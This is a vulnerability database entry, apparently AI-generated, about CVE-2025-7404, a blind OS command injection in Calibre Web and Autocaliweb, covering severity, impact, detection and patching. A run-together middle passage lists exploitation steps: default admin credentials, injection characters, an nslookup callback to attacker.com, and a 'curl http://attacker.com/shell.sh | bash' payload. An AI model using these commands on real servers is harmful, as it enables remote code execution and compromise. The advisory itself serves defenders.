
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-7404 is a blind OS command injection vulnerability (CWE-78) affecting Calibre Web version 0.6.24 ("Nicolette") and Autocaliweb versions 0.7.0 through 0.7.1. It allows attackers to inject and execute arbitrary operating system commands through improperly sanitized input. The vulnerability was published on July 24, 2025, and was discovered and reported by Fluid Attacks. It carries a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 base score of 5.9 (Medium), reflecting differing assessments of exploitation preconditions (Github Advisory, Fluid Attacks).
The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), meaning the application constructs OS commands using externally-influenced input without properly neutralizing shell metacharacters or command delimiters. The injection is "blind," meaning the attacker cannot directly observe command output in the HTTP response, requiring out-of-band techniques (e.g., DNS lookups, time delays, or reverse shells) to confirm execution. The CVSS v4.0 scoring notes that attack requirements are "Present" and privileges required are "High," suggesting the vulnerable functionality may be accessible only to authenticated admin users or under specific deployment conditions, though the CVSS v3.1 score of 9.8 reflects a no-authentication-required scenario. A public proof-of-concept exploit is available on GitHub (PoC GitHub, Fluid Attacks).
Successful exploitation allows an attacker to execute arbitrary OS commands on the server hosting Calibre Web or Autocaliweb, resulting in full compromise of confidentiality, integrity, and availability. An attacker could read sensitive files (including the Calibre library database and credentials), modify or delete data, install malware or backdoors, disrupt service availability, or use the compromised server as a pivot point for lateral movement within the network. Since the application is commonly self-hosted and may be exposed to the internet, the blast radius can extend to any data or systems accessible from the server's network context (Github Advisory, Fluid Attacks).
A public proof-of-concept exploit is available on GitHub (published around March 2, 2026) and a detailed advisory with exploitation details was published by Fluid Attacks (added to NVD references January 16, 2026) (PoC GitHub, Fluid Attacks). As of the available data, there is no confirmed evidence of active in-the-wild exploitation, and no threat actor attribution has been reported. The EPSS score is approximately 0.36% (per Feedly data) to 2.327% (per GitHub Advisory), placing it in the 85th percentile for exploitation likelihood within 30 days. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory).
admin/admin123) or previously obtained credentials.;, |, $(...), or backticks) into the vulnerable input field. Since the injection is blind, use out-of-band techniques such as a DNS callback (e.g., ; nslookup attacker.com) or a time-based delay (e.g., ; sleep 10) to confirm execution.; curl http://attacker.com/shell.sh | bash) or exfiltrate sensitive files via HTTP or DNS.;, |, $(), backticks) in input fields./bin/sh, bash, curl, wget, nslookup, python) visible in process trees./tmp; unexpected SSH authorized_keys modifications; web shells placed in the application's static file directories.For Autocaliweb, upgrade to version 0.7.1 or later, which contains the fix for this vulnerability. For Calibre Web, the GitHub Advisory notes no patched version is listed for the pip package as of the advisory date (July 25, 2025), but the upstream repository has since released versions beyond 0.6.24 (the latest being 0.6.26 as of February 2026); users should upgrade to the latest available release. As interim mitigations, restrict network access to the application using firewall rules or a reverse proxy with authentication, disable public-facing exposure of the admin interface, and monitor logs for suspicious command execution patterns. If patching is not immediately possible, consider taking the affected instance offline or isolating it from sensitive network segments (Github Advisory, Fluid Attacks).
The vulnerability was discovered and responsibly disclosed by Fluid Attacks, who published a detailed advisory. The GitHub Advisory Database rated the severity as "Moderate" (CVSS v4.0: 5.9), while NVD assigned a "Critical" CVSS v3.1 score of 9.8, reflecting differing interpretations of exploitation preconditions. The Autocaliweb repository was subsequently archived and development moved to Codeberg, which may affect the availability of future security patches for that fork. No significant broader media coverage or notable community debate has been identified beyond standard vulnerability database entries (Github Advisory, Fluid Attacks).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."